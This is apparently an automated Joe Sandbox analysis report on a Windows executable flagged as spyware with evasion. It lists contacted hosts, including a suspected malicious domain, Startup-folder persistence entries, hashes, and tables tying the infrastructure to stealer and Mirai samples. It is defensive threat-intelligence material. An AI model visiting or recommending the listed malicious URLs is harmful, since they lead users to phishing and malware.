204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
172.67.174.91	bamarelakij.site	United States	13335	CLOUDFLARENETUS	false
18.244.18.122	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
23.219.82.80	unknown	United States	20940	AKAMAI-ASN1EU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.97	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
184.28.190.49	unknown	United States	20940	AKAMAI-ASN1EU	false

Private

IP
192.168.2.10

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1586712
Start date and time:	2025-01-09 14:53:49 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	24EPV9vjc5.exe renamed because original name is a hash value
Original Sample Name:	c5056ac95a2002bc08cb0ec8dbf064f78dff400642ec1a6fc2a132984a7c1d99.exe
Detection:	MAL
Classification:	mal92.spyw.evad.winEXE@64/291@21/16
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 103 Number of non-executed functions: 273
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, Runtimeuserer.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 142.250.185.110, 13.107.6.158, 2.16.168.107, 2.16.168.120, 51.137.3.145, 2.23.209.5, 2.23.209.15, 2.23.209.17, 2.23.209.10, 2.23.209.9, 2.23.209.13, 2.23.209.7, 2.23.209.16, 2.23.209.12, 88.221.110.195, 88.221.110.179, 2.23.227.221, 2.23.227.215, 2.23.227.208, 13.74.129.1, 204.79.197.237, 13.107.21.237, 20.56.187.20, 142.251.40.163, 142.251.41.3, 142.250.80.3, 13.107.246.45, 52.149.20.212, 23.56.254.164, 94.245.104.56, 40.126.32.134, 40.118.171.167, 23.200.0.6, 20.75.60.91, 23.200.3.5, 13.107.246.40
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, prod-agic-we-2.westeurope.cloudapp.azure.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, otelrules.afd.azureedge.net, arc.msn.com, www.bing.com.edgekey.net, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, config.edge.skype.com, edge-microsoft-com.dual-a-0036.a-msedge.n
Execution Graph export aborted for target RescueCDBurner.exe, PID 3276 because there are no executed function
Execution Graph export aborted for target RescueCDBurner.exe, PID 6064 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 24EPV9vjc5.exe

Simulations

Behavior and APIs

Time	Type	Description
14:55:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITD8D8.tmp
14:55:20	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helpmonitorv3.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.159.61.3	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse
	malw.hta	Get hash	malicious	Branchlock Obfuscator	Browse
	malw.hta	Get hash	malicious	Unknown	Browse
	Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse
	Mansourbank Swift-TT379733 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse
23.219.82.16	mtbkkesfthae.exe	Get hash	malicious	Vidar	Browse
131.253.33.203	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse
	vMRlWtVCEN.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	invoice 700898 for wallcentre.com.shtml	Get hash	malicious	Unknown	Browse
	https://ecouterrepondeurvocal.pro/35-hnJZib	Get hash	malicious	Unknown	Browse
	edge_x86_KB91412024.exe	Get hash	malicious	Unknown	Browse
	https://unanimcar.club/a3662561be7feec2969c9f2dcb3bc8d0	Get hash	malicious	Unknown	Browse
	https://www.msn.com/en-ca/lifestyle/rf-buying-guides/redirect?rf_click_source=list&rf_client_click_id=000000000&rf_dws_location=&rf_item_id=502238318&rf_list_id=3519472&rf_partner_id=353781453390&rf_source=ebay&url=aHR0cHM6Ly9zdXBwb3J0LXRlYW1zbTM2MC5jYy8/aldFUz1iRzl5WlhSMFlTNXJaV0Z1WlVCaGNtTmhaR2xoYzI5c2RYUnBiMjV6TG1OdmJRPT0=	Get hash	malicious	Captcha Phish	Browse
	denuncia-6spnpo.PDF.htm	Get hash	malicious	Unknown	Browse
104.126.116.58	https://vk.com/away.php?to=https://hhu.tmw.temporary.site/wp-includes/myevri&post=809587144_14&cc_key=	Get hash	malicious	Unknown	Browse
52.182.143.215	mtbkkesfthae.exe	Get hash	malicious	Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg	Get hash	malicious	Mint Stealer	Browse
	S0FTWARE.exe	Get hash	malicious	Stealc, Vidar	Browse
	https://360merch-my.sharepoint.com/:u:/p/derek_cummins/Ee8aHkzMy41OgT5fOyc3qz4BdRJzT4bTlOlXY3v0Xazn9Q?e=hZ7jfl	Get hash	malicious	Unknown	Browse
	payment.eml	Get hash	malicious	HTMLPhisher	Browse
	https://homedigital.cloud/YoM8n6uU7J/.d7g/3Ugx2oDrh4/aGVscGRlc2tAZ290ZWNobm9sb2dpeC5jb20=	Get hash	malicious	HTMLPhisher	Browse
	Wave Browser.exe	Get hash	malicious	Unknown	Browse
	Quarantined Messages (1).zip	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	VmjvNTbD5J.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse	13.107.246.45
	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	13.107.246.45
	EMfRi659Ir.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	colleague[1].htm	Get hash	malicious	Unknown	Browse	13.107.246.45
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	13.107.246.45
	https://mo.iecxtug.ru/eoQpd/	Get hash	malicious	Unknown	Browse	13.107.246.45
	1In8uYbvZJ.ps1	Get hash	malicious	Unknown	Browse	13.107.246.45
	fuk7RfLrD3.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
sb.scorecardresearch.com	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse	18.244.18.122
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	18.244.18.38
	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	18.244.18.38
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	18.244.18.27
	https://t.co/qNQo33w8wD	Get hash	malicious	HTMLPhisher	Browse	18.244.18.32
	http://indyhumane.org	Get hash	malicious	Unknown	Browse	18.244.18.38
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse	18.244.18.32
	w3245.exe	Get hash	malicious	Unknown	Browse	18.244.18.27
	w3245.exe	Get hash	malicious	Unknown	Browse	18.244.18.32
chrome.cloudflare-dns.com	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse	162.159.61.3
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	162.159.61.3
	Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	162.159.61.3
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	SecurityScan_Release.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	LVkAi4PBv6.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	Mansourbank Swift-TT680169 Report.svg	Get hash	malicious	Branchlock Obfuscator	Browse	94.245.104.56
	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse	94.245.104.56
	random.exe	Get hash	malicious	Unknown	Browse	94.245.104.56
	over.ps1	Get hash	malicious	Vidar	Browse	94.245.104.56
	6684V5n83w.exe	Get hash	malicious	Vidar	Browse	94.245.104.56
	Bp4LoSXw83.lnk	Get hash	malicious	Unknown	Browse	94.245.104.56
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	94.245.104.56

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse	131.253.33.203
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	204.79.197.219
	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	20.189.173.28
	https://meliopayments.cloudfilesbureau.com/j319C	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow	Get hash	malicious	HTMLPhisher	Browse	20.42.73.31
	mpsl.elf	Get hash	malicious	Mirai	Browse	22.170.57.197
	m68k.elf	Get hash	malicious	Mirai	Browse	20.74.19.248
	arm.elf	Get hash	malicious	Mirai	Browse	20.64.30.232
	arm7.elf	Get hash	malicious	Mirai	Browse	22.183.20.33
AKAMAI-ASN1EU	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse	104.70.121.24
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	184.51.149.176
	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	184.28.190.59
	mpsl.elf	Get hash	malicious	Mirai	Browse	23.78.146.158
	m68k.elf	Get hash	malicious	Mirai	Browse	23.63.23.113
	spc.elf	Get hash	malicious	Mirai	Browse	23.194.118.65
	sh4.elf	Get hash	malicious	Mirai	Browse	23.199.18.240
	x86.elf	Get hash	malicious	Mirai	Browse	23.77.244.206
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	104.70.121.217
AKAMAI-ASN1EU	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse	104.70.121.24
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	184.51.149.176
	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	184.28.190.59
	mpsl.elf	Get hash	malicious	Mirai	Browse	23.78.146.158
	m68k.elf	Get hash	malicious	Mirai	Browse	23.63.23.113
	spc.elf	Get hash	malicious	Mirai	Browse	23.194.118.65
	sh4.elf	Get hash	malicious	Mirai	Browse	23.199.18.240
	x86.elf	Get hash	malicious	Mirai	Browse	23.77.244.206
	bc7EKCf.exe	Get hash	malicious	StormKitty	Browse	104.70.121.217
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://combatironapparel.com/collections/ranger-panty-shorts	Get hash	malicious	Unknown	Browse	131.253.33.203
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	204.79.197.219
	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	20.189.173.28
	https://meliopayments.cloudfilesbureau.com/j319C	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	https://laserglow-technologies-industrial-48815730.hubspotpagebuilder.com/laserglow	Get hash	malicious	HTMLPhisher	Browse	20.42.73.31
	mpsl.elf	Get hash	malicious	Mirai	Browse	22.170.57.197
	m68k.elf	Get hash	malicious	Mirai	Browse	20.74.19.248
	arm.elf	Get hash	malicious	Mirai	Browse	20.64.30.232
	arm7.elf	Get hash	malicious	Mirai	Browse	22.183.20.33

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse	172.67.174.91
	cLm7ThwEvh.msi	Get hash	malicious	Unknown	Browse	172.67.174.91
	digitalisierungskonzept_muster.js	Get hash	malicious	Unknown	Browse	172.67.174.91
	NvOxePa.exe	Get hash	malicious	LummaC	Browse	172.67.174.91
	digitalisierungskonzept_muster.js	Get hash	malicious	Unknown	Browse	172.67.174.91
	h3VYJaQqI9.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.174.91
	s7.mp4.hta	Get hash	malicious	LummaC	Browse	172.67.174.91
	uU6IvUPN39.exe	Get hash	malicious	LummaC	Browse	172.67.174.91

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	VmjvNTbD5J.exe	Get hash	malicious	Unknown	Browse
	1wrLmYiC62.exe	Get hash	malicious	Unknown	Browse
	8Rmoal0v85.exe	Get hash	malicious	Unknown	Browse
	K3UtwU3CH9.msi	Get hash	malicious	Unknown	Browse
	VmjvNTbD5J.exe	Get hash	malicious	Unknown	Browse
	1wrLmYiC62.exe	Get hash	malicious	Unknown	Browse
	vV5EOx0ipU.exe	Get hash	malicious	Unknown	Browse
	kXzODlqJak.exe	Get hash	malicious	Unknown	Browse
	8Rmoal0v85.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\1852c38f-85a3-4d8b-bfc1-88bd016cd583.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44523
Entropy (8bit):	6.097541937490731
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4xoTUXqgfbvDD0Tp+R+JD0aUQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7yOV3DW6qfyW0e6kaoZ
MD5:	D3551505BD809F4BC371282429DBDCBA
SHA1:	3CF3FE7B510B35909812FD8763F3F7FAD9857C72
SHA-256:	08EDED9A7FF34CAECDCC0C1B65A0F7D88372BCF716C3616624ADF2ADDC72D71C
SHA-512:	9BA7A556CAD6576D88D6013D422CA92297803CBCE5E05653DA06F1BBCA44206777CD72380C7816B92A1EBF0075823ADF5949BF03E7AD79BDAC8FD8A01678F5A4
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5ba712e4-4a93-4a92-97a5-b10570c9d319.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45796
Entropy (8bit):	6.089409221221042
Encrypted:	false
SSDEEP:	768:LMkbJrT8IeQc5dKWgUXqgfbvDD0Tp+R+JD0a9N2aPICvo2QYqGwLWZkHUfG671:LMk1rT8H1KU3DW98aPIaocqfyW0e6h
MD5:	C1CE218AB899E07221BCE022A28F89EC
SHA1:	14E08FB1BBDA92050FAF752E77182AE0ED1447A4
SHA-256:	E9EA489FF4EBCBBF96A48AC766875166DEC29A023D48ACB608BB4909AFAD2D89
SHA-512:	C359C1046752FFD237ED6825E06098CB8F2093A18F59A3BD8267E32201ADEDB5260320D08DBB3B76F177AF2D7C1BBC5EB5E34655BAC318E62807B6FD17D28083
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"7be0de29-7e58-449b-a272-7c2a271faad3"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736430971"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\61181f57-409b-4722-a63d-6cdde04b9aff.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	45873
Entropy (8bit):	6.089285996229516
Encrypted:	false
SSDEEP:	768:LMkbJrT8IeQc5DKWgUXqgfbvDDCTp+R+JD0a9N2aPICvo2QYqGwLWZkHUfG671:LMk1rT8HbKU3Dk98aPIaocqfyW0e6h
MD5:	5B59CFE5488A7701F5A041FA21230B08
SHA1:	020BB49D234A8FF404956817484FC29C9AEF06EB
SHA-256:	A9F06396C19A892E8B1BFB9C755C34EE09701B538C834CBAD5290D7BF9CF1773
SHA-512:	15F2124A0D1B1FCFB9814005F69E6914B3ADF9E336FC6637859443D213BB3447830BFE3BD06E8D3C1473D9C007EAD5AC88C5C079899E369377A69C18996BC26C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"7be0de29-7e58-449b-a272-7c2a271faad3"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736430971"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\868187b2-362a-47b1-8611-84c6d4c3aaaf.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	44445
Entropy (8bit):	6.097618149798754
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kLTUXqgfbvDDm5pOaZFmUQYqGwLWZkHUfG6kCvoZ:z/Ps+wsI7ynm3DT6qfyW0e6kaoZ
MD5:	5AD0CE277CFBEC305B911505954049BB
SHA1:	0D8CAFB872271E31E4FF32448CF9B410ADA70BA5
SHA-256:	53B3EA215159DA2DFED57355D3DF03AC41068754E3DA2A839FF0EB364858327E
SHA-512:	9699A3F4184E31C1741563B3ED441D5243BDC00115C90ECF34397E997F682A97E4B0A05FCFFE21E20C14444945AE1CD27B81CE4747C176BF06C726220CB4FBA4
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\a463e906-43c1-4380-bf7a-e56194cb992d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640159935562401
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
MD5:	D50EDBCB24807CB644253C4476148A1B
SHA1:	CBA3D7B6C0134871E694EDEDD4430947482F654B
SHA-256:	F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
SHA-512:	B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
Malicious:	false
Preview:	{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	107893
Entropy (8bit):	4.640159935562401
Encrypted:	false
SSDEEP:	1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
MD5:	D50EDBCB24807CB644253C4476148A1B
SHA1:	CBA3D7B6C0134871E694EDEDD4430947482F654B
SHA-256:	F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
SHA-512:	B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
Malicious:	false
